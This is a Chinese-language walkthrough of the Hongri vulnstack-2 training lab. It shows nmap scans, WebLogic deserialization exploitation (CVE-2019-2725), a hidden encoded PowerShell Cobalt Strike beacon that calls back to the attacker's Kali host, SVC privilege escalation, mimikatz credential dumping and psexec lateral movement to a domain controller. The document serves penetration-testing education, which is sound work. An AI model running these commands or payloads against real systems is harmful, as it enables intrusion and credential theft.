红日靶场二

一、准备工作

下载网址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/xia

下载完成后有三台虚拟机 一台是DC域控制器 一台是PC 还有WEB服务器密码都是 1qaz@WSX

使用工具:kali cs java反序列化工具 weblogicscan

双网卡模拟外网内网服务器

配置如下:

服务器 外网 内网
PC win7 192.168.159.201 10.10.10.201 客户机
DC 不出网 10.10.10.10 域控器
web服务器 win2008 server 192.168.159.44 10.10.10.80 web服务器
kali 192.168.159.128 null 攻击机

配置完成后启动三台服务器

启动web服务器:登录web服务器时注意使用administrator 登录 然后修改密码为1qaz@WSX

来到这个目录下启动 weblogicstart.cmd

二、信息收集

使用nmap探测主机存活

1
nmap -T4 -sP 192.168.159.1/24

发现存活ip

192.168.159.44端口扫描

端口扫描:

1
nmap -T4 -sS 192.168.159.1

发现开有7001端口 对应服务weblogic

三、漏洞扫描

发现使用的服务是 weblogic 10.3

使用weblogic漏洞扫描工具

1
python WeblogicScan.py  -u 192.168.159.44 -p 7001

发现漏洞:CVE-2017-3506 CVE-2019-2725 两个都是反序列化漏洞

1
2
3
4
5
6
7
8
9
[-] [192.168.159.44:7001] weblogic not detected CVE-2016-3510
[-] [192.168.159.44:7001] weblogic not detected CVE-2017-10271
[-] [192.168.159.44:7001] weblogic not detected CVE-2017-3248
[+] [192.168.159.44:7001] weblogic has a JAVA deserialization vulnerability:CVE-2017-3506
[-] [192.168.159.44:7001] weblogic not detected CVE-2018-2628
[-] [192.168.159.44:7001] weblogic not detected CVE-2018-2893
[-] [192.168.159.44:7001] weblogic not detected CVE-2018-2894
[+] [192.168.159.44:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[-] [192.168.159.44:7001] weblogic not detected CVE-2019-2890

四、漏洞利用

漏洞检测与利用

利用CVE-2019-2725 执行命令

1
java -jar Java反序列化漏洞利用工具V1.7.jar  

检测漏洞:

6

执行命令:

7

CS生成木马

kali启动CS:

1
./teamserver 192.168.159.128 123  

本机连接客户端

生成powershell - cmd马 前一步先创建一个监听 选择kali的IP 端口是8888

CS上线

在Java漏洞工具上执行

1
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQ....这里是你生成的木马

CS成功上线

五、权限提升

使用SVC提权脚本

权限提权成功system权限

1
2
3
[+] host called home, sent: 285834 bytes
[+] received output:
Started service ac60af4 on

六、内网信息收集

查看内网IP

1
shell  ipconfig /all

发现他的内网IP是10.10.10.80

查看域环境

查看域管理员

端口扫描portscan

1
portscan 10.10.10.80 1-1024,3389,5900-6000 none 1024

发现445端口都在开放 可以试试永恒之蓝之类的

密码获取minikitz

直接运行run minikitz

七、横向移动

sExec是一种轻量级的telnet替代品,可以在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件。PsExec强大的用途是在远程系统上启动交互式命令提示,远程启动执行包括IpConfig等cmd命令,故能够远程启动服务器上程序、脚本

SMB横向移动 使用 psexec64

拿下DC域控制器

使用psexec_psh 拿下PC权限

结束三台机器全都是system权限